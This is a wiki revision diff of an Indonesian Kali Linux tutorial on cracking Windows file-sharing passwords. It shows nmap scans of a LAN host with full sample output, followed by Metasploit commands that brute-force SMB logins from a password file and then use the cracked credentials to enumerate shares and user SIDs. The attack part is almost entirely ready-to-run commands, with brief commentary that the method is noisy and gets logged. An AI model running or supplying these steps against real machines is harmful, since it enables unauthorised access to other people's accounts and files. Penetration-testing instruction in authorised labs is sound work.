Difference between revisions of "Kali Linux: Membobol File Sharing Password di Windows 7"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 12: | Line 12: | ||
nmap -sS -A -O 192.168.0.7,90 | nmap -sS -A -O 192.168.0.7,90 | ||
+ | |||
+ | Contoh hasil | ||
+ | |||
+ | Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB | ||
+ | Nmap scan report for 192.168.0.7 | ||
+ | Host is up (0.0027s latency). | ||
+ | Not shown: 989 closed ports | ||
+ | PORT STATE SERVICE VERSION | ||
+ | 22/tcp open ssh OpenSSH 3.7.1p2 (protocol 2.0) | ||
+ | | ssh-hostkey: | ||
+ | |_ 1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA) | ||
+ | 80/tcp open http lighttpd 1.4.31 | ||
+ | |_http-server-header: lighttpd/1.4.31 | ||
+ | |_http-title: Site doesn't have a title (text/html). | ||
+ | 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) | ||
+ | 443/tcp open ssl/http lighttpd 1.4.31 | ||
+ | | http-cisco-anyconnect: | ||
+ | |_ ERROR: Not a Cisco ASA or unsupported version | ||
+ | |_http-server-header: lighttpd/1.4.31 | ||
+ | |_http-title: Site doesn't have a title (text/html). | ||
+ | | ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP | ||
+ | | Not valid before: 2007-06-13T05:47:53 | ||
+ | |_Not valid after: 2027-06-08T05:47:53 | ||
+ | |_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time. | ||
+ | 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) | ||
+ | 873/tcp open rsync (protocol version 30) | ||
+ | 8873/tcp open ssl/rsync (protocol version 30) | ||
+ | 9001/tcp open http libwww-perl-daemon httpd 1.36 | ||
+ | | http-cisco-anyconnect: | ||
+ | |_ ERROR: Not a Cisco ASA or unsupported version | ||
+ | | http-robots.txt: 1 disallowed entry | ||
+ | |_/ | ||
+ | |_http-title: Squeezebox Server | ||
+ | 9050/tcp open upnp TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1) | ||
+ | 9090/tcp open http uTorrent WebUI | ||
+ | |_http-methods: No Allow or Public header in OPTIONS response (status code 400) | ||
+ | |_http-title: Site doesn't have a title (text/html). | ||
+ | 22939/tcp open ssl/unknown | ||
+ | MAC Address: 4C:E6:76:1F:15:4C (Buffalo) | ||
+ | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). | ||
+ | TCP/IP fingerprint: | ||
+ | OS:SCAN(V=6.49BETA4%E=4%D=2/11%OT=22%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=4CE | ||
+ | OS:676%TM=56BBD996%P=x86_64-pc-linux-gnu)SEQ(SP=D6%GCD=1%ISR=D3%TI=Z%CI=Z%T | ||
+ | OS:S=A)SEQ(SP=C1%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B | ||
+ | OS:4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W | ||
+ | OS:1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0% | ||
+ | OS:O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R= | ||
+ | OS:Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40% | ||
+ | OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q= | ||
+ | OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A= | ||
+ | OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU | ||
+ | OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) | ||
+ | Network Distance: 1 hop | ||
+ | Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows | ||
+ | |||
+ | Host script results: | ||
+ | |_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | ||
+ | | smb-os-discovery: | ||
+ | | OS: Unix (Samba 3.6.3-31a.osstech) | ||
+ | | Computer name: TS-WVHL54C | ||
+ | | NetBIOS computer name: | ||
+ | | Domain name: | ||
+ | | FQDN: TS-WVHL54C | ||
+ | |_ System time: 2016-02-11T06:18:51+07:00 | ||
+ | | smb-security-mode: | ||
+ | | account_used: guest | ||
+ | | authentication_level: user | ||
+ | | challenge_response: supported | ||
+ | |_ message_signing: disabled (dangerous, but default) | ||
+ | |_smbv2-enabled: Server doesn't support SMBv2 protocol | ||
+ | |||
+ | TRACEROUTE | ||
+ | HOP RTT ADDRESS | ||
+ | 1 2.71 ms 192.168.0.7 | ||
+ | |||
+ | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | ||
+ | Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds | ||
+ | |||
==Hack Password== | ==Hack Password== | ||
Revision as of 07:50, 11 February 2016
Scan Jaringan
Contoh
nmap -sS -A -O 192.168.0.7 nmap -sS -A -O 192.168.0.0/24 nmap -sS -A -O 192.168.0.7,90
Contoh hasil
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB Nmap scan report for 192.168.0.7 Host is up (0.0027s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.7.1p2 (protocol 2.0) | ssh-hostkey: |_ 1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA) 80/tcp open http lighttpd 1.4.31 |_http-server-header: lighttpd/1.4.31 |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 443/tcp open ssl/http lighttpd 1.4.31 | http-cisco-anyconnect: |_ ERROR: Not a Cisco ASA or unsupported version |_http-server-header: lighttpd/1.4.31 |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP | Not valid before: 2007-06-13T05:47:53 |_Not valid after: 2027-06-08T05:47:53 |_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time. 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 873/tcp open rsync (protocol version 30) 8873/tcp open ssl/rsync (protocol version 30) 9001/tcp open http libwww-perl-daemon httpd 1.36 | http-cisco-anyconnect: |_ ERROR: Not a Cisco ASA or unsupported version | http-robots.txt: 1 disallowed entry |_/ |_http-title: Squeezebox Server 9050/tcp open upnp TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1) 9090/tcp open http uTorrent WebUI |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: Site doesn't have a title (text/html). 22939/tcp open ssl/unknown MAC Address: 4C:E6:76:1F:15:4C (Buffalo) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=6.49BETA4%E=4%D=2/11%OT=22%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=4CE OS:676%TM=56BBD996%P=x86_64-pc-linux-gnu)SEQ(SP=D6%GCD=1%ISR=D3%TI=Z%CI=Z%T OS:S=A)SEQ(SP=C1%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B OS:4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W OS:1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0% OS:O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R= OS:Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40% OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q= OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 1 hop Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.6.3-31a.osstech) | Computer name: TS-WVHL54C | NetBIOS computer name: | Domain name: | FQDN: TS-WVHL54C |_ System time: 2016-02-11T06:18:51+07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server doesn't support SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 2.71 ms 192.168.0.7 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds
Hack Password
Menggunakan cara bruteforce untuk hack password. Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan.
msfconsole thankyou use auxiliary/scanner/smb/smb_login show options set RHOSTS 192.168.31.2 set SMBUser sathish set PASS_FILE ‘/home/sathish/password’ set THREADS 10 run
use auxiliary/scanner/smb/smb_enumshares show options set RHOSTS 192.168.31.2 set SMBUser sathish set SMBPass bhuvi set THREADS 10 run
use auxiliary/scanner/smb/smb_lookupsid show options set RHOSTS 192.168.31.2 set SMBPass bhuvi set SMBUser sathish run